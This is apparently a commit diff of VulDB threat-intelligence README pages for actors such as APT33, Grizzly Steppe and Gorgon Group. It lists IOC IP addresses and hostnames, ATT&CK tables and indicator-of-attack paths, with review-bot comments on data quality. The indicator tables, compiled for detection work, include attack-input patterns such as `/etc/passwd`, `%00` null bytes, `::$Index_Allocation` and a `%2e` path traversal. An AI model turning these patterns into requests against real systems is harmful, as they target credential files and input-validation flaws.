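Review bot: row 10 keeps `5.149.250.235` at `High` while its hostname flips from `snigist.co.uk` to `quoll.tellfex.com`; an address whose reverse name changes between two runs is a shared or re-leased host, and the unchanged confidence shows the column is scored on the IP alone, so either label it as such in the header or let a hostname change lower it. Record both names with their lookup dates rather than overwriting, since the neighbouring `5.149.250.241 | flipveranda.co.uk` row will go the same way.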
@ -116,33 +116,33 @@ ID | Type | Indicator | Confidence
|
|||
20 | File | `/tmp` | Low
|
||||
21 | File | `/type.php` | Medium
|
||||
22 | File | `/uncpath/` | Medium
|
||||
23 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
24 | File | `4.2.0.CP09` | Medium
|
||||
25 | File | `14all.cgi/14all-1.1.cgi/traffic.cgi/mrtg.cgi` | High
|
||||
26 | File | `actions/CompanyDetailsSave.php` | High
|
||||
27 | File | `ActiveServices.java` | High
|
||||
28 | File | `admin.color.php` | High
|
||||
29 | File | `admin.cropcanvas.php` | High
|
||||
30 | File | `admin.joomlaradiov5.php` | High
|
||||
31 | File | `admin.php` | Medium
|
||||
32 | File | `admin/?n=user&c=admin_user&a=doGetUserInfo` | High
|
||||
33 | File | `admin/add-glossary.php` | High
|
||||
34 | File | `admin/conf_users_edit.php` | High
|
||||
35 | File | `admin/edit-comments.php` | High
|
||||
36 | File | `admin/src/containers/InputModalStepperProvider/index.js` | High
|
||||
37 | File | `admin/write-post.php` | High
|
||||
38 | File | `administrator/components/com_media/helpers/media.php` | High
|
||||
39 | File | `admin_events.php` | High
|
||||
40 | File | `AjaxApplication.java` | High
|
||||
41 | File | `akocomments.php` | High
|
||||
42 | File | `allopass-error.php` | High
|
||||
43 | File | `AllowBindAppWidgetActivity.java` | High
|
||||
44 | File | `AndroidManifest.xml` | High
|
||||
45 | File | `AnnotateActivity.java` | High
|
||||
46 | File | `announcement.php` | High
|
||||
23 | File | `/usr/bin/pkexec` | High
|
||||
24 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
25 | File | `4.2.0.CP09` | Medium
|
||||
26 | File | `14all.cgi/14all-1.1.cgi/traffic.cgi/mrtg.cgi` | High
|
||||
27 | File | `actions/CompanyDetailsSave.php` | High
|
||||
28 | File | `ActiveServices.java` | High
|
||||
29 | File | `admin.color.php` | High
|
||||
30 | File | `admin.cropcanvas.php` | High
|
||||
31 | File | `admin.joomlaradiov5.php` | High
|
||||
32 | File | `admin.php` | Medium
|
||||
33 | File | `admin/?n=user&c=admin_user&a=doGetUserInfo` | High
|
||||
34 | File | `admin/add-glossary.php` | High
|
||||
35 | File | `admin/conf_users_edit.php` | High
|
||||
36 | File | `admin/edit-comments.php` | High
|
||||
37 | File | `admin/src/containers/InputModalStepperProvider/index.js` | High
|
||||
38 | File | `admin/write-post.php` | High
|
||||
39 | File | `administrator/components/com_media/helpers/media.php` | High
|
||||
40 | File | `admin_events.php` | High
|
||||
41 | File | `AjaxApplication.java` | High
|
||||
42 | File | `akocomments.php` | High
|
||||
43 | File | `allopass-error.php` | High
|
||||
44 | File | `AllowBindAppWidgetActivity.java` | High
|
||||
45 | File | `AndroidManifest.xml` | High
|
||||
46 | File | `AnnotateActivity.java` | High
|
||||
47 | ... | ... | ...
|
||||
|
||||
There are 404 more IOA items available. Please use our online service to access the data.
|
||||
There are 406 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
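Review bot: `/usr/bin/pkexec` is inserted as row 23 at `High`, and the same path is added to the APT33 IOA table in this commit; it is the standard location of the polkit `pkexec` binary, present on practically every Linux desktop and many servers, so as a file indicator it matches everything and says nothing about this actor. If the row encodes interest in a specific pkexec vulnerability, the table needs that vulnerability reference, not the path. The trailing count also moves from `404 more` to `406 more`, so one further entry was added beyond the visible rows and cannot be reviewed here.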
@ -1,6 +1,6 @@
|
|||
# Gaza Cybergang - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Gaza Cybergang](https://vuldb.com/?actor.gaza_cybergang). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Gaza Cybergang](https://vuldb.com/?actor.gaza_cybergang). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.gaza_cybergang](https://vuldb.com/?actor.gaza_cybergang)
|
||||
|
||||
|
@ -28,12 +28,11 @@ These indicators of compromise indicate associated network ressources which are
|
|||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
1 | 45.63.97.44 | 45.63.97.44.vultr.com | Medium
|
||||
2 | 82.211.30.186 | cud3.newyparkingspaces.com | High
|
||||
3 | 82.211.30.192 | cud9.newyparkingspaces.com | High
|
||||
4 | 82.211.30.212 | cud29.newyparkingspaces.com | High
|
||||
5 | ... | ... | ...
|
||||
2 | 82.211.30.186 | - | High
|
||||
3 | 82.211.30.192 | - | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOC items available. Please use our online service to access the data.
|
||||
There are 7 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
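Review bot: rows 2 and 3 lose their hostnames (`cud3.newyparkingspaces.com` and `cud9.newyparkingspaces.com` become `-`) and row 4 `82.211.30.212 | cud29.newyparkingspaces.com` drops below the cutoff (`6 more` to `7 more`, total still 10); a PTR that stops resolving is itself useful (the domain was dropped or the hosts were re-leased), and blanking it throws away the only pivot to `newyparkingspaces.com`, which tied three of the four visible addresses together. Keep the last-seen name with a date instead of overwriting it with `-`.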
@ -54,19 +53,12 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `api_poller.php` | High
|
||||
2 | File | `crossdomain.xml` | High
|
||||
3 | File | `diy/module/member/controllers/Api.php` | High
|
||||
4 | File | `Forms/tools_admin_1` | High
|
||||
5 | File | `install/page_dbsettings.php` | High
|
||||
6 | File | `register/check/username?username` | High
|
||||
7 | File | `rzpnk.sys` | Medium
|
||||
8 | File | `wp-includes/class-wp-query.php` | High
|
||||
9 | Library | `C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll` | High
|
||||
10 | Library | `mshtml.dll` | Medium
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/index.php/newsletter/subscriber/new/` | High
|
||||
2 | File | `api_poller.php` | High
|
||||
3 | File | `crossdomain.xml` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOA items available. Please use our online service to access the data.
|
||||
There are 14 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
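Review bot: the excerpt shrinks from 10 rows to 3 (`11 | ...` becomes `4 | ...`) while the count goes from `6 more` to `14 more`, so the set grows from 16 to 17 entries but the page now shows under a fifth of it; the two `Library` rows (the `printconfig.dll` DriverStore path and `mshtml.dll`) and `rzpnk.sys` are no longer visible, so the table no longer shows that Type can be anything but `File`. Three rows is too small an excerpt for a README whose point is the indicators; pick a fixed row count (the APT33 IOA table in this same commit shows 23) and apply it everywhere.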
@ -79,9 +71,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -1,6 +1,6 @@
# Gorgon Group - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Gorgon Group](https://vuldb.com/?actor.gorgon_group). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Gorgon Group](https://vuldb.com/?actor.gorgon_group). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.gorgon_group](https://vuldb.com/?actor.gorgon_group)

@ -37,10 +37,9 @@ ID | Type | Indicator | Confidence
1 | File | `/uncpath/` | Medium
2 | File | `app/controllers/frontend/PostController.php` | High
3 | File | `www/soap/application/MCSoap/Logs.php` | High
4 | Argument | `score` | Low
5 | Input Value | `%00` | Low
6 | Input Value | `::$Index_Allocation` | High
7 | Network Port | `Web Server Port` | High
4 | ... | ... | ...

There are 4 more IOA items available. Please use our online service to access the data.

## References

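Review bot: the four rows dropped here (4 Argument `score`, 5 Input Value `%00`, 6 Input Value `::$Index_Allocation`, 7 Network Port `Web Server Port`) are the only non-File indicator types in this table, and nothing in the hunk says why they go while the generic `/uncpath/` row at Medium confidence stays. If the regeneration now restricts the exported sample to Type = File, say so in the IOA intro text; if not, treat this as a filtering regression to check before merge, because the null-byte and `::$Index_Allocation` alternate-data-stream values are the entries a detection engineer can actually match on in request logs.
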
@ -52,9 +51,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -1,6 +1,6 @@
# Grizzly Steppe - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Grizzly Steppe](https://vuldb.com/?actor.grizzly_steppe). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Grizzly Steppe](https://vuldb.com/?actor.grizzly_steppe). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.grizzly_steppe](https://vuldb.com/?actor.grizzly_steppe)

@ -8,12 +8,12 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac

These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Grizzly Steppe:

* CN
* RU
* US
* LU
* NO
* ...

There are 59 more country items available. Please use our online service to access the data.
There are 18 more country items available. Please use our online service to access the data.

## IOC - Indicator of Compromise

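Review bot: the trailer drops from `There are 59 more country items` to `There are 18 more country items` while the visible list (CN, RU, US, LU, NO, ...) is unchanged, so 41 countries silently left this actor's attribution set. Please state in the commit message whether this is an intentional re-scoring or a data loss in the regeneration; the same revision also cuts this actor's IOA trailer from 25121 to 240 items, which makes the second explanation the more likely one and worth ruling out before merge.
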
@ -41,9 +41,113 @@ ID | IP address | Hostname | Confidence
18 | 5.77.47.142 | - | High
19 | 5.133.8.152 | vendorcool.com | High
20 | 5.133.8.162 | d8162.artnet.gda.pl | High
21 | ... | ... | ...
21 | 5.133.179.243 | better-support4u.com | High
22 | 5.134.1.250 | 5.134.1.250.hosted.by.stone-is.net | High
23 | 5.135.65.145 | - | High
24 | 5.135.65.146 | - | High
25 | 5.135.186.35 | ns3291871.ip-5-135-186.eu | High
26 | 5.135.199.28 | - | High
27 | 5.149.249.172 | - | High
28 | 5.149.254.114 | mail1.auditoriavanzada.info | High
29 | 5.153.233.58 | - | High
30 | 5.153.234.90 | - | High
31 | 5.157.38.34 | - | High
32 | 5.189.188.111 | vmd78384.contaboserver.net | High
33 | 5.196.1.129 | vps-3d93b08b.vps.ovh.net | High
34 | 5.196.58.96 | ip96.ip-5-196-58.eu | High
35 | 5.199.171.58 | - | High
36 | 5.199.172.147 | hst-172-147.cloudlix.com | High
37 | 5.212.1.1 | - | High
38 | 5.249.145.164 | host164-145-249-5.serverdedicati.aruba.it | High
39 | 5.255.80.27 | srv23.mylady8.com | High
40 | 8.39.147.120 | - | High
41 | 23.239.10.144 | tor.shamm.as | High
42 | 23.254.211.232 | hwsrv-930953.hostwindsdns.com | High
43 | 27.24.190.240 | - | High
44 | 27.50.94.251 | - | High
45 | 31.16.91.237 | ip1f105bed.dynamic.kabel-deutschland.de | High
46 | 31.31.72.43 | - | High
47 | 31.132.0.11 | no.rdns.ukservers.com | High
48 | 31.132.0.12 | no.rdns.ukservers.com | High
49 | 31.148.219.50 | - | High
50 | 31.148.219.166 | - | High
51 | 31.148.219.168 | - | High
52 | 31.148.219.176 | - | High
53 | 31.168.172.147 | 31-168-172-147.telavivwifi.com | High
54 | 31.186.96.19 | diburo.ru | High
55 | 31.186.96.20 | test.diburo.ru | High
56 | 31.192.228.185 | 31-192-228-185-static.glesys.net | High
57 | 31.210.111.154 | . | High
58 | 31.210.117.131 | . | High
59 | 31.210.118.89 | . | High
60 | 31.210.123.213 | . | High
61 | 31.210.123.214 | . | High
62 | 31.210.125.99 | . | High
63 | 31.210.125.100 | . | High
64 | 31.220.43.99 | - | High
65 | 35.0.127.52 | tor-exit.eecs.umich.edu | High
66 | 37.0.127.44 | bidder-quail.fellnear.net | High
67 | 37.48.93.246 | 3906-others.noaaonline.com | High
68 | 37.59.42.55 | dev.upyourbizz.com | High
69 | 37.59.63.190 | ns3100645.ip-37-59-63.eu | High
70 | 37.59.123.142 | 142.ip-37-59-123.eu | High
71 | 37.123.130.176 | h-37-123-130-176.A183.corp.bahnhof.se | High
72 | 37.123.130.186 | h-37-123-130-186.A183.corp.bahnhof.se | High
73 | 37.139.52.47 | coachrobbo.com | High
74 | 37.146.14.44 | 37-146-14-44.broadband.corbina.ru | High
75 | 37.187.7.74 | ns3372567.ip-37-187-7.eu | High
76 | 37.187.239.8 | 8.ip-37-187-239.eu | High
77 | 37.187.247.3 | 3.ip-37-187-247.eu | High
78 | 37.220.35.36 | - | High
79 | 37.233.99.157 | - | High
80 | 37.235.53.237 | 237.53.235.37.in-addr.arpa | High
81 | 37.247.54.157 | - | High
82 | 38.110.220.169 | - | High
83 | 41.77.136.250 | - | High
84 | 41.212.1.1 | po-0-0-0.edge1.uk-ln-TH-E.wananchi.com | High
85 | 41.215.241.147 | - | High
86 | 42.1.1.1 | - | High
87 | 42.51.11.66 | - | High
88 | 42.112.33.43 | - | High
89 | 43.1.1.1 | - | High
90 | 45.32.239.246 | 45.32.239.246.vultr.com | Medium
91 | 45.55.178.34 | - | High
92 | 45.56.90.85 | 45-56-90-85.ip.linodeusercontent.com | High
93 | 45.62.255.94 | notassigned.cloudatcost.com | High
94 | 45.79.85.112 | li1184-112.members.linode.com | High
95 | 46.4.193.146 | server.netica.pl | High
96 | 46.17.100.14 | - | High
97 | 46.28.68.158 | a.prohoster.info | High
98 | 46.28.110.136 | - | High
99 | 46.28.111.122 | - | High
100 | 46.29.248.238 | - | High
101 | 46.73.164.160 | ip-46-73-164-160.bb.netbynet.ru | High
102 | 46.148.17.98 | - | High
103 | 46.148.17.99 | - | High
104 | 46.148.17.100 | - | High
105 | 46.148.17.210 | - | High
106 | 46.148.26.78 | stb.fox-tv.info | High
107 | 46.165.196.229 | - | High
108 | 46.165.197.1 | - | High
109 | 46.165.223.217 | - | High
110 | 46.165.228.119 | - | High
111 | 46.165.230.5 | tor-exit.dhalgren.org | High
112 | 46.166.137.224 | - | High
113 | 46.166.137.240 | - | High
114 | 46.166.137.245 | - | High
115 | 46.166.138.129 | - | High
116 | 46.166.138.141 | - | High
117 | 46.166.138.142 | - | High
118 | 46.166.138.147 | - | High
119 | 46.166.186.243 | tsn46-166-168-243.dyn.nltelcom.net | High
120 | 46.166.188.228 | - | High
121 | 46.166.190.182 | - | High
122 | 46.166.190.192 | - | High
123 | 46.166.190.223 | - | High
124 | 46.242.66.240 | broadband-46-242-66-240.ip.moscow.rt.ru | High
125 | ... | ... | ...

There are 600 more IOC items available. Please use our online service to access the data.
There are 496 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

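Review bot: several of the added rows need a consistency pass before they ship as High-confidence blocklist material. Rows 57 to 63 use `.` in the Hostname column where every other row without a PTR record uses `-`, so a consumer that keys on `-` will treat those seven entries as named hosts. Row 80 carries `237.53.235.37.in-addr.arpa`, which is the reverse-lookup name itself rather than a hostname and belongs in the `-` category. Rows 37, 84, 86 and 89 (`5.212.1.1`, `41.212.1.1`, `42.1.1.1`, `43.1.1.1`) look like truncated or mis-parsed addresses and deserve a check against the source observation. Rows 41, 65 and 111 (`tor.shamm.as`, `tor-exit.eecs.umich.edu`, `tor-exit.dhalgren.org`) are Tor exit nodes: every Tor user will match them, so High confidence for actor attribution overstates what the address alone tells a defender; tag them as exit nodes or lower the confidence, as this hunk already does for the shared `vultr.com` host in row 90.
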
@ -51,14 +155,12 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us

ID | Technique | Description | Confidence
-- | --------- | ----------- | ----------
1 | T1008 | Algorithm Downgrade | High
2 | T1040 | Authentication Bypass by Capture-replay | High
3 | T1059.007 | Cross Site Scripting | High
4 | T1068 | Execution with Unnecessary Privileges | High
5 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
6 | ... | ... | ...
1 | T1040 | Authentication Bypass by Capture-replay | High
2 | T1059.007 | Cross Site Scripting | High
3 | T1068 | Execution with Unnecessary Privileges | High
4 | ... | ... | ...

There are 11 more TTP items available. Please use our online service to access the data.
There are 10 more TTP items available. Please use our online service to access the data.

## IOA - Indicator of Attack

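Review bot: the Description column does not carry the ATT&CK technique names that the Technique column implies. In ATT&CK, T1040 is Network Sniffing, T1059.007 is Command and Scripting Interpreter: JavaScript, T1068 is Exploitation for Privilege Escalation and T1110.001 is Brute Force: Password Guessing, whereas the text shown (Authentication Bypass by Capture-replay, Cross Site Scripting, Execution with Unnecessary Privileges, Improper Restriction of Excessive Authentication Attempts) reads like the CWE weakness names of the underlying vulnerabilities. Either rename the column to make the weakness-to-technique mapping explicit or emit the ATT&CK names, so that a reader importing this table into an ATT&CK Navigator layer is not misled. The removed `1 | T1008 | Algorithm Downgrade | High` row had the same mismatch (T1008 is Fallback Channels).
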
@ -66,19 +168,36 @@ These indicators of attack list the potential fragments used for technical activ

ID | Type | Indicator | Confidence
-- | ---- | --------- | ----------
1 | File | `#!/system` | Medium
2 | File | `$HOME/.forward` | High
3 | File | `$JENKINS_HOME/jenkins.security.RekeySecretAdminMonitor/backups` | High
4 | File | `%2a` | Low
5 | File | `%APPDATA%` | Medium
6 | File | `%PROGRAMDATA%\1E\Client` | High
7 | File | `%PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10` | High
8 | File | `%PROGRAMDATA%\Psyprax32\PPScreen.ini` | High
9 | File | `%PROGRAMFILES%\Cylance\Desktop\log` | High
10 | File | `%PROGRAMFILES(X86)%/Aternity Information Systems/Assistant/plugins` | High
11 | ... | ... | ...
1 | File | `/admin/index.php?lfj=mysql&action=del` | High
2 | File | `/authen/start/` | High
3 | File | `/cgi-bin/luci/rc` | High
4 | File | `/cms/ajax.php` | High
5 | File | `/context/%2e/WEB-INF/web.xml` | High
6 | File | `/domain/service/.ewell-known/caldav` | High
7 | File | `/download` | Medium
8 | File | `/etc/hosts` | Medium
9 | File | `/formWlanSetup` | High
10 | File | `/include/chart_generator.php` | High
11 | File | `/modules/profile/index.php` | High
12 | File | `/monitoring` | Medium
13 | File | `/music/ajax.php` | High
14 | File | `/new` | Low
15 | File | `/pandora_console/ajax.php` | High
16 | File | `/plugins/servlet/audit/resource` | High
17 | File | `/plugins/servlet/project-config/PROJECT/roles` | High
18 | File | `/proc/<pid>/status` | High
19 | File | `/public/plugins/` | High
20 | File | `/rest/api/1.0/render` | High
21 | File | `/RestAPI` | Medium
22 | File | `/secure/QueryComponent!Default.jspa` | High
23 | File | `/src/main/java/com/dotmarketing/filters/CMSFilter.java` | High
24 | File | `/tmp` | Low
25 | File | `/uncpath/` | Medium
26 | File | `/var/log/nginx` | High
27 | File | `account.php` | Medium
28 | ... | ... | ...

There are 25121 more IOA items available. Please use our online service to access the data.
There are 240 more IOA items available. Please use our online service to access the data.

## References

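Review bot: the trailer changes from `There are 25121 more IOA items` to `There are 240 more IOA items`, a reduction of more than 99% that nothing in the hunk explains; if the exported sample is now deliberately capped, the trailer should say so instead of presenting 240 as the remaining total. Among the rows kept, `/tmp` (Low), `/etc/hosts` (Medium), `/download` (Medium), `/new` (Low) and `/monitoring` (Medium) are paths present on virtually every host or web application, so a consumer who feeds this table into a web-log or file-integrity rule gets noise rather than actor signal; consider excluding entries below a confidence threshold from the exported sample. Row 18 `/proc/<pid>/status` is a pattern containing a placeholder, not a literal path, and the Type column should reflect that.
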
@ -91,9 +210,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -14,8 +14,8 @@ The following campaigns are known and can be associated with Inception:

These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Inception:

* PL
* SV
* IT
* FR
* ...

@ -61,25 +61,25 @@ ID | Type | Indicator | Confidence
6 | File | `/domain/service/.ewell-known/caldav` | High
7 | File | `/etc/passwd` | Medium
8 | File | `/formAdvFirewall` | High
9 | File | `/goods/getGoodsListByConditions/` | High
10 | File | `/home/user/dir` | High
11 | File | `/master/article.php` | High
12 | File | `/mobile/SelectUsers.jsp` | High
13 | File | `/ProteinArraySignificanceTest.json` | High
14 | File | `/Videos/Id/hls/PlaylistId/SegmentId.SegmentContainer` | High
15 | File | `/web` | Low
16 | File | `4.edu.php\conn\function.php` | High
17 | File | `abc.c` | Low
18 | File | `admin/bad.php` | High
19 | File | `admin/dl_sendmail.php` | High
20 | File | `admin/edit.php` | High
21 | File | `admin/pages/useredit.php` | High
22 | File | `AdminBaseController.class.php` | High
23 | File | `AlertReceiver.java` | High
24 | File | `AndroidManifest.xml` | High
9 | File | `/home/user/dir` | High
10 | File | `/master/article.php` | High
11 | File | `/mobile/SelectUsers.jsp` | High
12 | File | `/ProteinArraySignificanceTest.json` | High
13 | File | `/Videos/Id/hls/PlaylistId/SegmentId.SegmentContainer` | High
14 | File | `/web` | Low
15 | File | `4.edu.php\conn\function.php` | High
16 | File | `abc.c` | Low
17 | File | `admin/bad.php` | High
18 | File | `admin/dl_sendmail.php` | High
19 | File | `admin/edit.php` | High
20 | File | `admin/pages/useredit.php` | High
21 | File | `AdminBaseController.class.php` | High
22 | File | `AlertReceiver.java` | High
23 | File | `AndroidManifest.xml` | High
24 | File | `apc.php` | Low
25 | ... | ... | ...

There are 213 more IOA items available. Please use our online service to access the data.
There are 212 more IOA items available. Please use our online service to access the data.

## References

@ -1,9 +1,16 @@
# KryptoCibule - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [KryptoCibule](https://vuldb.com/?actor.kryptocibule). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [KryptoCibule](https://vuldb.com/?actor.kryptocibule). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.kryptocibule](https://vuldb.com/?actor.kryptocibule)

## Countries

These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with KryptoCibule:

* CN
* US

## IOC - Indicator of Compromise

These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of KryptoCibule.

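Review bot: the generator template still spells `ressources` in the IOC intro line (`These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of KryptoCibule.`); the same sentence is emitted into every actor file this commit touches (it recurs in the LokiBot and Monarchy hunks), so fix it once in the template as `resources` rather than per file.
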
@ -22,9 +29,9 @@ The following list contains external sources which discuss the actor and the ass

The following articles explain our unique predictive cyber threat intelligence:

* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)

## License

(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -242,12 +242,15 @@ ID | Type | Indicator | Confidence
5 | File | `/ecma/operations/ecma-objects.c` | High
6 | File | `/GetCopiedFile` | High
7 | File | `/hdf5/src/H5T.c` | High
8 | File | `/leave_system/classes/Login.php` | High
9 | File | `/risque/administration/referentiel/json/create/categorie` | High
10 | File | `/rsms/` | Low
11 | ... | ... | ...
8 | File | `/jerry-core/ecma/operations/ecma-get-put-value.c` | High
9 | File | `/jerry-core/ecma/operations/ecma-typedarray-object.c` | High
10 | File | `/leave_system/classes/Login.php` | High
11 | File | `/plugin` | Low
12 | File | `/rest/collectors/1.0/template/custom` | High
13 | File | `/risque/administration/referentiel/json/create/categorie` | High
14 | ... | ... | ...

There are 80 more IOA items available. Please use our online service to access the data.
There are 115 more IOA items available. Please use our online service to access the data.

## References

@ -1,12 +1,12 @@
# Lokibot - Cyber Threat Intelligence
# LokiBot - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Lokibot](https://vuldb.com/?actor.lokibot). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [LokiBot](https://vuldb.com/?actor.lokibot). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.lokibot](https://vuldb.com/?actor.lokibot)

## Countries

These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Lokibot:
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with LokiBot:

* ES
* US

@ -17,7 +17,7 @@ There are 12 more country items available. Please use our online service to acce

## IOC - Indicator of Compromise

